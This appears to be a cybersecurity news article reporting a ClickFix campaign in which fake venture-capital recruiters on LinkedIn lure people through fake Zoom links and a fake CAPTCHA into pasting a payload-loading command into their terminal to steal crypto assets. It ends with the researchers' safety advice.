Cybersecurity researchers have found a new so-called ClickFix campaign that, this time, seeks to steal crypto assets via fake job offers.

Moonlock Lab noted that this new campaign is distinct because, in addition to the ClickFix technique, which is designed to execute malicious commands disguised as a routine browser verification step, it also employs advanced social engineering and cross-platform payload delivery.

In short, the threat actor, posing as a venture capitalist, contacts a potential victim on LinkedIn and tricks them into opening a fake Zoom meeting link, which then redirects them to a fake website with a fake "I’m not a robot" verification.

After clicking this checkbox, a malicious command is written to the user’s clipboard. Next, the potential victim is instructed to open their terminal and paste the contents of the clipboard. Then, the usual ClickFix manipulation continues, tricking users into thinking they're undergoing a verification process.

"The attackers have invested in realistic OS-specific UI elements, cursor animations, and psychological pressure mechanics. The user genuinely believes they are completing a security verification to access a conference page, when they are, in fact, executing a remote payload loader on their own machine," Moonlock Lab said.

The researchers claim that the malicious domains belong to the same registrant, Boston-based Anatolli Bigdasch, who is supposedly the founder of venture capital firm SolidBit Capital. Meanwhile, persona Mykhailo Hureiev, listed as "Co-Founder & Managing Partner" at SolidBit Capital, was mentioned earlier this year in a recruiter scam warning.

According to @0xbigdan, they were contacted by Hureiev, which eventually resulted in two malicious links being shared. The poster listed red flags in this interaction, such as lookalike domains (typosquatting) and urgency to join external links.

"When I invited him to my Google Meet, he joined, stayed silent, then disconnected. Account blocked after," they added.

Meanwhile, according to the cybersecurity researchers, this campaign is well-structured and built to rotate identities when one front is exposed, while company identities are also constantly changing. Now, companies called MegaBit and Lumax Capital are also tied by the researchers to the same threat campaign.

To stay safe from ClickFix attacks, the researchers recommend verifying the company that contacted you, being cautious if a conversation quickly moves off LinkedIn, treating urgency as a red flag, and never pasting commands into your terminal.

---

Unlock more exclusive Cybernews content on YouTube.